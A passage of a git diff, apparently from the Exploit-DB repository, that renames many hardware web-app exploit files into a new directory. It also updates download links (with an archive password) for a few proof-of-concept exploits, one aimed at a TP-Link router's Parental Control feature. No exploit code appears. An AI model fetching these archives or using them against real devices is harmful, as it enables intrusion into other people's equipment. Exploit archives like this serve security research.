rename to exploits/hardware/webapps/34206.txt diff --git a/platforms/hardware/webapps/34254.txt b/exploits/hardware/webapps/34254.txt similarity index 96% rename from platforms/hardware/webapps/34254.txt rename to exploits/hardware/webapps/34254.txt index 3036d5cd5..2350397b4 100644 --- a/platforms/hardware/webapps/34254.txt +++ b/exploits/hardware/webapps/34254.txt @@ -7,7 +7,7 @@ # Tested on: TP-Link TL-WR740N v4 Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34254.7z (Password: TP-P0wned-Link) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34254.7z (Password: TP-P0wned-Link) Vulnerability description: The domain name parameters of the "Parental Control" and "Access diff --git a/platforms/hardware/webapps/34361.txt b/exploits/hardware/webapps/34361.txt similarity index 100% rename from platforms/hardware/webapps/34361.txt rename to exploits/hardware/webapps/34361.txt diff --git a/platforms/hardware/webapps/34583.txt b/exploits/hardware/webapps/34583.txt similarity index 100% rename from platforms/hardware/webapps/34583.txt rename to exploits/hardware/webapps/34583.txt diff --git a/platforms/hardware/webapps/34584.txt b/exploits/hardware/webapps/34584.txt similarity index 100% rename from platforms/hardware/webapps/34584.txt rename to exploits/hardware/webapps/34584.txt diff --git a/platforms/hardware/webapps/34680.txt b/exploits/hardware/webapps/34680.txt similarity index 100% rename from platforms/hardware/webapps/34680.txt rename to exploits/hardware/webapps/34680.txt diff --git a/platforms/hardware/webapps/34751.pl b/exploits/hardware/webapps/34751.pl similarity index 100% rename from platforms/hardware/webapps/34751.pl rename to exploits/hardware/webapps/34751.pl diff --git a/platforms/hardware/webapps/34779.pl b/exploits/hardware/webapps/34779.pl similarity index 100% rename from platforms/hardware/webapps/34779.pl rename to exploits/hardware/webapps/34779.pl diff --git a/platforms/hardware/webapps/34956.txt b/exploits/hardware/webapps/34956.txt similarity index 100% rename from platforms/hardware/webapps/34956.txt rename to exploits/hardware/webapps/34956.txt diff --git a/platforms/hardware/webapps/34969.html b/exploits/hardware/webapps/34969.html similarity index 100% rename from platforms/hardware/webapps/34969.html rename to exploits/hardware/webapps/34969.html diff --git a/platforms/hardware/webapps/35047.txt b/exploits/hardware/webapps/35047.txt similarity index 100% rename from platforms/hardware/webapps/35047.txt rename to exploits/hardware/webapps/35047.txt diff --git a/platforms/hardware/webapps/35056.txt b/exploits/hardware/webapps/35056.txt similarity index 100% rename from platforms/hardware/webapps/35056.txt rename to exploits/hardware/webapps/35056.txt diff --git a/platforms/hardware/webapps/35075.txt b/exploits/hardware/webapps/35075.txt similarity index 100% rename from platforms/hardware/webapps/35075.txt rename to exploits/hardware/webapps/35075.txt diff --git a/platforms/hardware/webapps/35128.txt b/exploits/hardware/webapps/35128.txt similarity index 100% rename from platforms/hardware/webapps/35128.txt rename to exploits/hardware/webapps/35128.txt diff --git a/platforms/hardware/webapps/35203.txt b/exploits/hardware/webapps/35203.txt similarity index 100% rename from platforms/hardware/webapps/35203.txt rename to exploits/hardware/webapps/35203.txt diff --git a/platforms/hardware/webapps/35208.txt b/exploits/hardware/webapps/35208.txt similarity index 100% rename from platforms/hardware/webapps/35208.txt rename to exploits/hardware/webapps/35208.txt diff --git a/platforms/hardware/webapps/35272.txt b/exploits/hardware/webapps/35272.txt similarity index 100% rename from platforms/hardware/webapps/35272.txt rename to exploits/hardware/webapps/35272.txt diff --git a/platforms/hardware/webapps/35276.txt b/exploits/hardware/webapps/35276.txt similarity index 100% rename from platforms/hardware/webapps/35276.txt rename to exploits/hardware/webapps/35276.txt diff --git a/platforms/hardware/webapps/35325.txt b/exploits/hardware/webapps/35325.txt similarity index 100% rename from platforms/hardware/webapps/35325.txt rename to exploits/hardware/webapps/35325.txt diff --git a/platforms/hardware/webapps/35372.rb b/exploits/hardware/webapps/35372.rb similarity index 100% rename from platforms/hardware/webapps/35372.rb rename to exploits/hardware/webapps/35372.rb diff --git a/platforms/hardware/webapps/35419.txt b/exploits/hardware/webapps/35419.txt similarity index 100% rename from platforms/hardware/webapps/35419.txt rename to exploits/hardware/webapps/35419.txt diff --git a/platforms/hardware/webapps/35442.txt b/exploits/hardware/webapps/35442.txt similarity index 100% rename from platforms/hardware/webapps/35442.txt rename to exploits/hardware/webapps/35442.txt diff --git a/platforms/hardware/webapps/35462.txt b/exploits/hardware/webapps/35462.txt similarity index 100% rename from platforms/hardware/webapps/35462.txt rename to exploits/hardware/webapps/35462.txt diff --git a/platforms/hardware/webapps/35556.txt b/exploits/hardware/webapps/35556.txt similarity index 100% rename from platforms/hardware/webapps/35556.txt rename to exploits/hardware/webapps/35556.txt diff --git a/platforms/hardware/webapps/35721.txt b/exploits/hardware/webapps/35721.txt similarity index 100% rename from platforms/hardware/webapps/35721.txt rename to exploits/hardware/webapps/35721.txt diff --git a/platforms/hardware/webapps/35747.pl b/exploits/hardware/webapps/35747.pl similarity index 100% rename from platforms/hardware/webapps/35747.pl rename to exploits/hardware/webapps/35747.pl diff --git a/platforms/hardware/webapps/35750.pl b/exploits/hardware/webapps/35750.pl similarity index 100% rename from platforms/hardware/webapps/35750.pl rename to exploits/hardware/webapps/35750.pl diff --git a/platforms/hardware/webapps/35751.pl b/exploits/hardware/webapps/35751.pl similarity index 100% rename from platforms/hardware/webapps/35751.pl rename to exploits/hardware/webapps/35751.pl diff --git a/platforms/hardware/webapps/35770.py b/exploits/hardware/webapps/35770.py similarity index 100% rename from platforms/hardware/webapps/35770.py rename to exploits/hardware/webapps/35770.py diff --git a/platforms/hardware/webapps/35933.txt b/exploits/hardware/webapps/35933.txt similarity index 100% rename from platforms/hardware/webapps/35933.txt rename to exploits/hardware/webapps/35933.txt diff --git a/platforms/hardware/webapps/36042.txt b/exploits/hardware/webapps/36042.txt similarity index 100% rename from platforms/hardware/webapps/36042.txt rename to exploits/hardware/webapps/36042.txt diff --git a/platforms/hardware/webapps/36105.sh b/exploits/hardware/webapps/36105.sh similarity index 100% rename from platforms/hardware/webapps/36105.sh rename to exploits/hardware/webapps/36105.sh diff --git a/platforms/hardware/webapps/36202.py b/exploits/hardware/webapps/36202.py similarity index 100% rename from platforms/hardware/webapps/36202.py rename to exploits/hardware/webapps/36202.py diff --git a/platforms/hardware/webapps/36241.txt b/exploits/hardware/webapps/36241.txt similarity index 100% rename from platforms/hardware/webapps/36241.txt rename to exploits/hardware/webapps/36241.txt diff --git a/platforms/hardware/webapps/36286.txt b/exploits/hardware/webapps/36286.txt similarity index 100% rename from platforms/hardware/webapps/36286.txt rename to exploits/hardware/webapps/36286.txt diff --git a/platforms/hardware/webapps/36865.txt b/exploits/hardware/webapps/36865.txt similarity index 100% rename from platforms/hardware/webapps/36865.txt rename to exploits/hardware/webapps/36865.txt diff --git a/platforms/hardware/webapps/36978.txt b/exploits/hardware/webapps/36978.txt similarity index 100% rename from platforms/hardware/webapps/36978.txt rename to exploits/hardware/webapps/36978.txt diff --git a/platforms/hardware/webapps/36987.pl b/exploits/hardware/webapps/36987.pl similarity index 100% rename from platforms/hardware/webapps/36987.pl rename to exploits/hardware/webapps/36987.pl diff --git a/platforms/hardware/webapps/36988.pl b/exploits/hardware/webapps/36988.pl similarity index 100% rename from platforms/hardware/webapps/36988.pl rename to exploits/hardware/webapps/36988.pl diff --git a/platforms/hardware/webapps/37135.txt b/exploits/hardware/webapps/37135.txt similarity index 100% rename from platforms/hardware/webapps/37135.txt rename to exploits/hardware/webapps/37135.txt diff --git a/platforms/hardware/webapps/37154.rb b/exploits/hardware/webapps/37154.rb similarity index 100% rename from platforms/hardware/webapps/37154.rb rename to exploits/hardware/webapps/37154.rb diff --git a/platforms/hardware/webapps/37172.txt b/exploits/hardware/webapps/37172.txt similarity index 100% rename from platforms/hardware/webapps/37172.txt rename to exploits/hardware/webapps/37172.txt diff --git a/platforms/hardware/webapps/37185.py b/exploits/hardware/webapps/37185.py similarity index 100% rename from platforms/hardware/webapps/37185.py rename to exploits/hardware/webapps/37185.py diff --git a/platforms/hardware/webapps/37214.txt b/exploits/hardware/webapps/37214.txt similarity index 100% rename from platforms/hardware/webapps/37214.txt rename to exploits/hardware/webapps/37214.txt diff --git a/platforms/hardware/webapps/37237.txt b/exploits/hardware/webapps/37237.txt similarity index 100% rename from platforms/hardware/webapps/37237.txt rename to exploits/hardware/webapps/37237.txt diff --git a/platforms/hardware/webapps/37238.txt b/exploits/hardware/webapps/37238.txt similarity index 100% rename from platforms/hardware/webapps/37238.txt rename to exploits/hardware/webapps/37238.txt diff --git a/platforms/hardware/webapps/37240.txt b/exploits/hardware/webapps/37240.txt similarity index 100% rename from platforms/hardware/webapps/37240.txt rename to exploits/hardware/webapps/37240.txt diff --git a/platforms/hardware/webapps/37241.txt b/exploits/hardware/webapps/37241.txt similarity index 100% rename from platforms/hardware/webapps/37241.txt rename to exploits/hardware/webapps/37241.txt diff --git a/platforms/hardware/webapps/37258.py b/exploits/hardware/webapps/37258.py similarity index 100% rename from platforms/hardware/webapps/37258.py rename to exploits/hardware/webapps/37258.py diff --git a/platforms/hardware/webapps/37261.txt b/exploits/hardware/webapps/37261.txt similarity index 100% rename from platforms/hardware/webapps/37261.txt rename to exploits/hardware/webapps/37261.txt diff --git a/platforms/hardware/webapps/37298.txt b/exploits/hardware/webapps/37298.txt similarity index 100% rename from platforms/hardware/webapps/37298.txt rename to exploits/hardware/webapps/37298.txt diff --git a/platforms/hardware/webapps/37323.txt b/exploits/hardware/webapps/37323.txt similarity index 100% rename from platforms/hardware/webapps/37323.txt rename to exploits/hardware/webapps/37323.txt diff --git a/platforms/hardware/webapps/37424.py b/exploits/hardware/webapps/37424.py similarity index 100% rename from platforms/hardware/webapps/37424.py rename to exploits/hardware/webapps/37424.py diff --git a/platforms/hardware/webapps/37425.py b/exploits/hardware/webapps/37425.py similarity index 100% rename from platforms/hardware/webapps/37425.py rename to exploits/hardware/webapps/37425.py diff --git a/platforms/hardware/webapps/37449.txt b/exploits/hardware/webapps/37449.txt similarity index 100% rename from platforms/hardware/webapps/37449.txt rename to exploits/hardware/webapps/37449.txt diff --git a/platforms/hardware/webapps/37454.txt b/exploits/hardware/webapps/37454.txt similarity index 100% rename from platforms/hardware/webapps/37454.txt rename to exploits/hardware/webapps/37454.txt diff --git a/platforms/hardware/webapps/37516.txt b/exploits/hardware/webapps/37516.txt similarity index 100% rename from platforms/hardware/webapps/37516.txt rename to exploits/hardware/webapps/37516.txt diff --git a/platforms/hardware/webapps/37524.txt b/exploits/hardware/webapps/37524.txt similarity index 100% rename from platforms/hardware/webapps/37524.txt rename to exploits/hardware/webapps/37524.txt diff --git a/platforms/hardware/webapps/37527.txt b/exploits/hardware/webapps/37527.txt similarity index 100% rename from platforms/hardware/webapps/37527.txt rename to exploits/hardware/webapps/37527.txt diff --git a/platforms/hardware/webapps/37531.txt b/exploits/hardware/webapps/37531.txt similarity index 100% rename from platforms/hardware/webapps/37531.txt rename to exploits/hardware/webapps/37531.txt diff --git a/platforms/hardware/webapps/37532.txt b/exploits/hardware/webapps/37532.txt similarity index 100% rename from platforms/hardware/webapps/37532.txt rename to exploits/hardware/webapps/37532.txt diff --git a/platforms/hardware/webapps/37623.txt b/exploits/hardware/webapps/37623.txt similarity index 100% rename from platforms/hardware/webapps/37623.txt rename to exploits/hardware/webapps/37623.txt diff --git a/platforms/hardware/webapps/37624.txt b/exploits/hardware/webapps/37624.txt similarity index 100% rename from platforms/hardware/webapps/37624.txt rename to exploits/hardware/webapps/37624.txt diff --git a/platforms/hardware/webapps/37625.txt b/exploits/hardware/webapps/37625.txt similarity index 100% rename from platforms/hardware/webapps/37625.txt rename to exploits/hardware/webapps/37625.txt diff --git a/platforms/hardware/webapps/37626.txt b/exploits/hardware/webapps/37626.txt similarity index 100% rename from platforms/hardware/webapps/37626.txt rename to exploits/hardware/webapps/37626.txt diff --git a/platforms/hardware/webapps/37720.py b/exploits/hardware/webapps/37720.py similarity index 100% rename from platforms/hardware/webapps/37720.py rename to exploits/hardware/webapps/37720.py diff --git a/platforms/hardware/webapps/37770.txt b/exploits/hardware/webapps/37770.txt similarity index 100% rename from platforms/hardware/webapps/37770.txt rename to exploits/hardware/webapps/37770.txt diff --git a/platforms/hardware/webapps/37778.txt b/exploits/hardware/webapps/37778.txt similarity index 100% rename from platforms/hardware/webapps/37778.txt rename to exploits/hardware/webapps/37778.txt diff --git a/platforms/hardware/webapps/37801.sh b/exploits/hardware/webapps/37801.sh similarity index 100% rename from platforms/hardware/webapps/37801.sh rename to exploits/hardware/webapps/37801.sh diff --git a/platforms/hardware/webapps/37965.txt b/exploits/hardware/webapps/37965.txt similarity index 100% rename from platforms/hardware/webapps/37965.txt rename to exploits/hardware/webapps/37965.txt diff --git a/platforms/hardware/webapps/37982.pl b/exploits/hardware/webapps/37982.pl similarity index 100% rename from platforms/hardware/webapps/37982.pl rename to exploits/hardware/webapps/37982.pl diff --git a/platforms/hardware/webapps/38004.txt b/exploits/hardware/webapps/38004.txt similarity index 100% rename from platforms/hardware/webapps/38004.txt rename to exploits/hardware/webapps/38004.txt diff --git a/platforms/hardware/webapps/38029.txt b/exploits/hardware/webapps/38029.txt similarity index 100% rename from platforms/hardware/webapps/38029.txt rename to exploits/hardware/webapps/38029.txt diff --git a/platforms/hardware/webapps/38034.txt b/exploits/hardware/webapps/38034.txt similarity index 100% rename from platforms/hardware/webapps/38034.txt rename to exploits/hardware/webapps/38034.txt diff --git a/platforms/hardware/webapps/38056.txt b/exploits/hardware/webapps/38056.txt similarity index 100% rename from platforms/hardware/webapps/38056.txt rename to exploits/hardware/webapps/38056.txt diff --git a/platforms/hardware/webapps/38067.py b/exploits/hardware/webapps/38067.py similarity index 100% rename from platforms/hardware/webapps/38067.py rename to exploits/hardware/webapps/38067.py diff --git a/platforms/hardware/webapps/38073.html b/exploits/hardware/webapps/38073.html similarity index 100% rename from platforms/hardware/webapps/38073.html rename to exploits/hardware/webapps/38073.html diff --git a/platforms/hardware/webapps/38080.txt b/exploits/hardware/webapps/38080.txt similarity index 100% rename from platforms/hardware/webapps/38080.txt rename to exploits/hardware/webapps/38080.txt diff --git a/platforms/hardware/webapps/38081.txt b/exploits/hardware/webapps/38081.txt similarity index 100% rename from platforms/hardware/webapps/38081.txt rename to exploits/hardware/webapps/38081.txt diff --git a/platforms/hardware/webapps/38097.txt b/exploits/hardware/webapps/38097.txt similarity index 100% rename from platforms/hardware/webapps/38097.txt rename to exploits/hardware/webapps/38097.txt diff --git a/platforms/hardware/webapps/38245.txt b/exploits/hardware/webapps/38245.txt similarity index 100% rename from platforms/hardware/webapps/38245.txt rename to exploits/hardware/webapps/38245.txt diff --git a/platforms/hardware/webapps/38350.txt b/exploits/hardware/webapps/38350.txt similarity index 100% rename from platforms/hardware/webapps/38350.txt rename to exploits/hardware/webapps/38350.txt diff --git a/platforms/hardware/webapps/38369.txt b/exploits/hardware/webapps/38369.txt similarity index 100% rename from platforms/hardware/webapps/38369.txt rename to exploits/hardware/webapps/38369.txt diff --git a/platforms/hardware/webapps/38409.html b/exploits/hardware/webapps/38409.html similarity index 100% rename from platforms/hardware/webapps/38409.html rename to exploits/hardware/webapps/38409.html diff --git a/platforms/hardware/webapps/38448.txt b/exploits/hardware/webapps/38448.txt similarity index 100% rename from platforms/hardware/webapps/38448.txt rename to exploits/hardware/webapps/38448.txt diff --git a/platforms/hardware/webapps/38449.txt b/exploits/hardware/webapps/38449.txt similarity index 100% rename from platforms/hardware/webapps/38449.txt rename to exploits/hardware/webapps/38449.txt diff --git a/platforms/hardware/webapps/38455.txt b/exploits/hardware/webapps/38455.txt similarity index 100% rename from platforms/hardware/webapps/38455.txt rename to exploits/hardware/webapps/38455.txt diff --git a/platforms/hardware/webapps/38470.txt b/exploits/hardware/webapps/38470.txt similarity index 100% rename from platforms/hardware/webapps/38470.txt rename to exploits/hardware/webapps/38470.txt diff --git a/platforms/hardware/webapps/38471.txt b/exploits/hardware/webapps/38471.txt similarity index 100% rename from platforms/hardware/webapps/38471.txt rename to exploits/hardware/webapps/38471.txt diff --git a/platforms/hardware/webapps/38488.txt b/exploits/hardware/webapps/38488.txt similarity index 100% rename from platforms/hardware/webapps/38488.txt rename to exploits/hardware/webapps/38488.txt diff --git a/platforms/hardware/webapps/38514.py b/exploits/hardware/webapps/38514.py similarity index 100% rename from platforms/hardware/webapps/38514.py rename to exploits/hardware/webapps/38514.py diff --git a/platforms/hardware/webapps/38553.txt b/exploits/hardware/webapps/38553.txt similarity index 100% rename from platforms/hardware/webapps/38553.txt rename to exploits/hardware/webapps/38553.txt diff --git a/platforms/hardware/webapps/38575.txt b/exploits/hardware/webapps/38575.txt similarity index 100% rename from platforms/hardware/webapps/38575.txt rename to exploits/hardware/webapps/38575.txt diff --git a/platforms/hardware/webapps/38604.txt b/exploits/hardware/webapps/38604.txt similarity index 100% rename from platforms/hardware/webapps/38604.txt rename to exploits/hardware/webapps/38604.txt diff --git a/platforms/hardware/webapps/38657.html b/exploits/hardware/webapps/38657.html similarity index 100% rename from platforms/hardware/webapps/38657.html rename to exploits/hardware/webapps/38657.html diff --git a/platforms/hardware/webapps/38707.txt b/exploits/hardware/webapps/38707.txt similarity index 100% rename from platforms/hardware/webapps/38707.txt rename to exploits/hardware/webapps/38707.txt diff --git a/platforms/hardware/webapps/38772.txt b/exploits/hardware/webapps/38772.txt similarity index 100% rename from platforms/hardware/webapps/38772.txt rename to exploits/hardware/webapps/38772.txt diff --git a/platforms/hardware/webapps/38773.txt b/exploits/hardware/webapps/38773.txt similarity index 100% rename from platforms/hardware/webapps/38773.txt rename to exploits/hardware/webapps/38773.txt diff --git a/platforms/hardware/webapps/38840.txt b/exploits/hardware/webapps/38840.txt similarity index 100% rename from platforms/hardware/webapps/38840.txt rename to exploits/hardware/webapps/38840.txt diff --git a/platforms/hardware/webapps/38853.sh b/exploits/hardware/webapps/38853.sh similarity index 100% rename from platforms/hardware/webapps/38853.sh rename to exploits/hardware/webapps/38853.sh diff --git a/platforms/hardware/webapps/38913.txt b/exploits/hardware/webapps/38913.txt similarity index 100% rename from platforms/hardware/webapps/38913.txt rename to exploits/hardware/webapps/38913.txt diff --git a/platforms/hardware/webapps/38914.txt b/exploits/hardware/webapps/38914.txt similarity index 100% rename from platforms/hardware/webapps/38914.txt rename to exploits/hardware/webapps/38914.txt diff --git a/platforms/hardware/webapps/38929.txt b/exploits/hardware/webapps/38929.txt similarity index 100% rename from platforms/hardware/webapps/38929.txt rename to exploits/hardware/webapps/38929.txt diff --git a/platforms/hardware/webapps/38971.txt b/exploits/hardware/webapps/38971.txt similarity index 100% rename from platforms/hardware/webapps/38971.txt rename to exploits/hardware/webapps/38971.txt diff --git a/platforms/hardware/webapps/39184.txt b/exploits/hardware/webapps/39184.txt similarity index 100% rename from platforms/hardware/webapps/39184.txt rename to exploits/hardware/webapps/39184.txt diff --git a/platforms/hardware/webapps/39192.rb b/exploits/hardware/webapps/39192.rb similarity index 100% rename from platforms/hardware/webapps/39192.rb rename to exploits/hardware/webapps/39192.rb diff --git a/platforms/hardware/webapps/39356.py b/exploits/hardware/webapps/39356.py similarity index 100% rename from platforms/hardware/webapps/39356.py rename to exploits/hardware/webapps/39356.py diff --git a/platforms/hardware/webapps/39407.txt b/exploits/hardware/webapps/39407.txt similarity index 100% rename from platforms/hardware/webapps/39407.txt rename to exploits/hardware/webapps/39407.txt diff --git a/platforms/hardware/webapps/39408.txt b/exploits/hardware/webapps/39408.txt similarity index 100% rename from platforms/hardware/webapps/39408.txt rename to exploits/hardware/webapps/39408.txt diff --git a/platforms/hardware/webapps/39409.txt b/exploits/hardware/webapps/39409.txt similarity index 100% rename from platforms/hardware/webapps/39409.txt rename to exploits/hardware/webapps/39409.txt diff --git a/platforms/hardware/webapps/39412.txt b/exploits/hardware/webapps/39412.txt similarity index 100% rename from platforms/hardware/webapps/39412.txt rename to exploits/hardware/webapps/39412.txt diff --git a/platforms/hardware/webapps/39581.txt b/exploits/hardware/webapps/39581.txt similarity index 100% rename from platforms/hardware/webapps/39581.txt rename to exploits/hardware/webapps/39581.txt diff --git a/platforms/hardware/webapps/39622.txt b/exploits/hardware/webapps/39622.txt similarity index 100% rename from platforms/hardware/webapps/39622.txt rename to exploits/hardware/webapps/39622.txt diff --git a/platforms/hardware/webapps/39641.html b/exploits/hardware/webapps/39641.html similarity index 100% rename from platforms/hardware/webapps/39641.html rename to exploits/hardware/webapps/39641.html diff --git a/platforms/hardware/webapps/39659.txt b/exploits/hardware/webapps/39659.txt similarity index 100% rename from platforms/hardware/webapps/39659.txt rename to exploits/hardware/webapps/39659.txt diff --git a/platforms/hardware/webapps/39672.txt b/exploits/hardware/webapps/39672.txt similarity index 100% rename from platforms/hardware/webapps/39672.txt rename to exploits/hardware/webapps/39672.txt diff --git a/platforms/hardware/webapps/39677.html b/exploits/hardware/webapps/39677.html similarity index 100% rename from platforms/hardware/webapps/39677.html rename to exploits/hardware/webapps/39677.html diff --git a/platforms/hardware/webapps/39683.txt b/exploits/hardware/webapps/39683.txt similarity index 100% rename from platforms/hardware/webapps/39683.txt rename to exploits/hardware/webapps/39683.txt diff --git a/platforms/hardware/webapps/39696.txt b/exploits/hardware/webapps/39696.txt similarity index 100% rename from platforms/hardware/webapps/39696.txt rename to exploits/hardware/webapps/39696.txt diff --git a/platforms/hardware/webapps/39716.py b/exploits/hardware/webapps/39716.py similarity index 100% rename from platforms/hardware/webapps/39716.py rename to exploits/hardware/webapps/39716.py diff --git a/platforms/hardware/webapps/39725.rb b/exploits/hardware/webapps/39725.rb similarity index 100% rename from platforms/hardware/webapps/39725.rb rename to exploits/hardware/webapps/39725.rb diff --git a/platforms/hardware/webapps/39726.rb b/exploits/hardware/webapps/39726.rb similarity index 100% rename from platforms/hardware/webapps/39726.rb rename to exploits/hardware/webapps/39726.rb diff --git a/platforms/hardware/webapps/39739.py b/exploits/hardware/webapps/39739.py similarity index 100% rename from platforms/hardware/webapps/39739.py rename to exploits/hardware/webapps/39739.py diff --git a/platforms/hardware/webapps/39798.txt b/exploits/hardware/webapps/39798.txt similarity index 100% rename from platforms/hardware/webapps/39798.txt rename to exploits/hardware/webapps/39798.txt diff --git a/platforms/hardware/webapps/39951.txt b/exploits/hardware/webapps/39951.txt similarity index 100% rename from platforms/hardware/webapps/39951.txt rename to exploits/hardware/webapps/39951.txt diff --git a/platforms/hardware/webapps/39962.txt b/exploits/hardware/webapps/39962.txt similarity index 100% rename from platforms/hardware/webapps/39962.txt rename to exploits/hardware/webapps/39962.txt diff --git a/platforms/hardware/webapps/40016.txt b/exploits/hardware/webapps/40016.txt similarity index 100% rename from platforms/hardware/webapps/40016.txt rename to exploits/hardware/webapps/40016.txt diff --git a/platforms/hardware/webapps/40158.txt b/exploits/hardware/webapps/40158.txt similarity index 100% rename from platforms/hardware/webapps/40158.txt rename to exploits/hardware/webapps/40158.txt diff --git a/platforms/hardware/webapps/40159.txt b/exploits/hardware/webapps/40159.txt similarity index 100% rename from platforms/hardware/webapps/40159.txt rename to exploits/hardware/webapps/40159.txt diff --git a/platforms/hardware/webapps/40160.py b/exploits/hardware/webapps/40160.py similarity index 100% rename from platforms/hardware/webapps/40160.py rename to exploits/hardware/webapps/40160.py diff --git a/platforms/hardware/webapps/40207.txt b/exploits/hardware/webapps/40207.txt similarity index 100% rename from platforms/hardware/webapps/40207.txt rename to exploits/hardware/webapps/40207.txt diff --git a/platforms/hardware/webapps/40276.txt b/exploits/hardware/webapps/40276.txt similarity index 86% rename from platforms/hardware/webapps/40276.txt rename to exploits/hardware/webapps/40276.txt index 460af5f5e..73f218219 100644 --- a/platforms/hardware/webapps/40276.txt +++ b/exploits/hardware/webapps/40276.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40276.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40276.zip \ No newline at end of file diff --git a/platforms/hardware/webapps/40284.txt b/exploits/hardware/webapps/40284.txt similarity index 100% rename from platforms/hardware/webapps/40284.txt rename to exploits/hardware/webapps/40284.txt diff --git a/platforms/hardware/webapps/40332.py b/exploits/hardware/webapps/40332.py similarity index 100% rename from platforms/hardware/webapps/40332.py rename to exploits/hardware/webapps/40332.py diff --git a/platforms/hardware/webapps/40357.py b/exploits/hardware/webapps/40357.py similarity index 100% rename from platforms/hardware/webapps/40357.py rename to exploits/hardware/webapps/40357.py diff --git a/platforms/hardware/webapps/40432.txt b/exploits/hardware/webapps/40432.txt similarity index 100% rename from platforms/hardware/webapps/40432.txt rename to exploits/hardware/webapps/40432.txt diff --git a/platforms/hardware/webapps/40626.txt b/exploits/hardware/webapps/40626.txt similarity index 100% rename from platforms/hardware/webapps/40626.txt rename to exploits/hardware/webapps/40626.txt diff --git a/platforms/hardware/webapps/40629.txt b/exploits/hardware/webapps/40629.txt similarity index 100% rename from platforms/hardware/webapps/40629.txt rename to exploits/hardware/webapps/40629.txt diff --git a/platforms/hardware/webapps/40640.txt b/exploits/hardware/webapps/40640.txt similarity index 100% rename from platforms/hardware/webapps/40640.txt rename to exploits/hardware/webapps/40640.txt diff --git a/platforms/hardware/webapps/40690.txt b/exploits/hardware/webapps/40690.txt similarity index 97% rename from platforms/hardware/webapps/40690.txt rename to exploits/hardware/webapps/40690.txt index ed79a779a..b40932b21 100644 --- a/platforms/hardware/webapps/40690.txt +++ b/exploits/hardware/webapps/40690.txt @@ -81,4 +81,4 @@ Have had no further contact with them, unable to get a CVE assigned for this, pr Full Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40690.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40690.zip \ No newline at end of file diff --git a/platforms/hardware/webapps/40837.txt b/exploits/hardware/webapps/40837.txt similarity index 100% rename from platforms/hardware/webapps/40837.txt rename to exploits/hardware/webapps/40837.txt diff --git a/platforms/hardware/webapps/40853.txt b/exploits/hardware/webapps/40853.txt similarity index 100% rename from platforms/hardware/webapps/40853.txt rename to exploits/hardware/webapps/40853.txt diff --git a/platforms/hardware/webapps/40856.txt b/exploits/hardware/webapps/40856.txt similarity index 100% rename from platforms/hardware/webapps/40856.txt rename to exploits/hardware/webapps/40856.txt diff --git a/platforms/hardware/webapps/40887.txt b/exploits/hardware/webapps/40887.txt similarity index 100% rename from platforms/hardware/webapps/40887.txt rename to exploits/hardware/webapps/40887.txt diff --git a/platforms/hardware/webapps/40898.txt b/exploits/hardware/webapps/40898.txt similarity index 100% rename from platforms/hardware/webapps/40898.txt rename to exploits/hardware/webapps/40898.txt diff --git a/platforms/hardware/webapps/40901.txt b/exploits/hardware/webapps/40901.txt similarity index 100% rename from platforms/hardware/webapps/40901.txt rename to exploits/hardware/webapps/40901.txt diff --git a/platforms/hardware/webapps/40977.txt b/exploits/hardware/webapps/40977.txt similarity index 100% rename from platforms/hardware/webapps/40977.txt rename to exploits/hardware/webapps/40977.txt diff --git a/platforms/hardware/webapps/40978.txt b/exploits/hardware/webapps/40978.txt similarity index 100% rename from platforms/hardware/webapps/40978.txt rename to exploits/hardware/webapps/40978.txt diff --git a/platforms/hardware/webapps/40982.html b/exploits/hardware/webapps/40982.html similarity index 100% rename from platforms/hardware/webapps/40982.html rename to exploits/hardware/webapps/40982.html diff --git a/platforms/hardware/webapps/40983.html b/exploits/hardware/webapps/40983.html similarity index 100% rename from platforms/hardware/webapps/40983.html rename to exploits/hardware/webapps/40983.html diff --git a/platforms/hardware/webapps/41017.txt b/exploits/hardware/webapps/41017.txt similarity index 100% rename from platforms/hardware/webapps/41017.txt rename to exploits/hardware/webapps/41017.txt diff --git a/platforms/hardware/webapps/41033.txt b/exploits/hardware/webapps/41033.txt similarity index 100% rename from platforms/hardware/webapps/41033.txt rename to exploits/hardware/webapps/41033.txt diff --git a/platforms/hardware/webapps/41074.txt b/exploits/hardware/webapps/41074.txt similarity index 100% rename from platforms/hardware/webapps/41074.txt rename to exploits/hardware/webapps/41074.txt diff --git a/platforms/hardware/webapps/41077.sh b/exploits/hardware/webapps/41077.sh similarity index 100% rename from platforms/hardware/webapps/41077.sh rename to exploits/hardware/webapps/41077.sh diff --git a/platforms/hardware/webapps/41078.sh b/exploits/hardware/webapps/41078.sh similarity index 100% rename from platforms/hardware/webapps/41078.sh rename to exploits/hardware/webapps/41078.sh diff --git a/platforms/hardware/webapps/41117.sh b/exploits/hardware/webapps/41117.sh similarity index 100% rename from platforms/hardware/webapps/41117.sh rename to exploits/hardware/webapps/41117.sh diff --git a/platforms/hardware/webapps/41118.sh b/exploits/hardware/webapps/41118.sh similarity index 100% rename from platforms/hardware/webapps/41118.sh rename to exploits/hardware/webapps/41118.sh diff --git a/platforms/hardware/webapps/41147.txt b/exploits/hardware/webapps/41147.txt similarity index 100% rename from platforms/hardware/webapps/41147.txt rename to exploits/hardware/webapps/41147.txt diff --git a/platforms/hardware/webapps/41170.txt b/exploits/hardware/webapps/41170.txt similarity index 100% rename from platforms/hardware/webapps/41170.txt rename to exploits/hardware/webapps/41170.txt diff --git a/platforms/hardware/webapps/41175.txt b/exploits/hardware/webapps/41175.txt similarity index 100% rename from platforms/hardware/webapps/41175.txt rename to exploits/hardware/webapps/41175.txt diff --git a/platforms/hardware/webapps/41205.py b/exploits/hardware/webapps/41205.py similarity index 100% rename from platforms/hardware/webapps/41205.py rename to exploits/hardware/webapps/41205.py diff --git a/platforms/hardware/webapps/41208.txt b/exploits/hardware/webapps/41208.txt similarity index 100% rename from platforms/hardware/webapps/41208.txt rename to exploits/hardware/webapps/41208.txt diff --git a/platforms/hardware/webapps/41299.html b/exploits/hardware/webapps/41299.html similarity index 100% rename from platforms/hardware/webapps/41299.html rename to exploits/hardware/webapps/41299.html diff --git 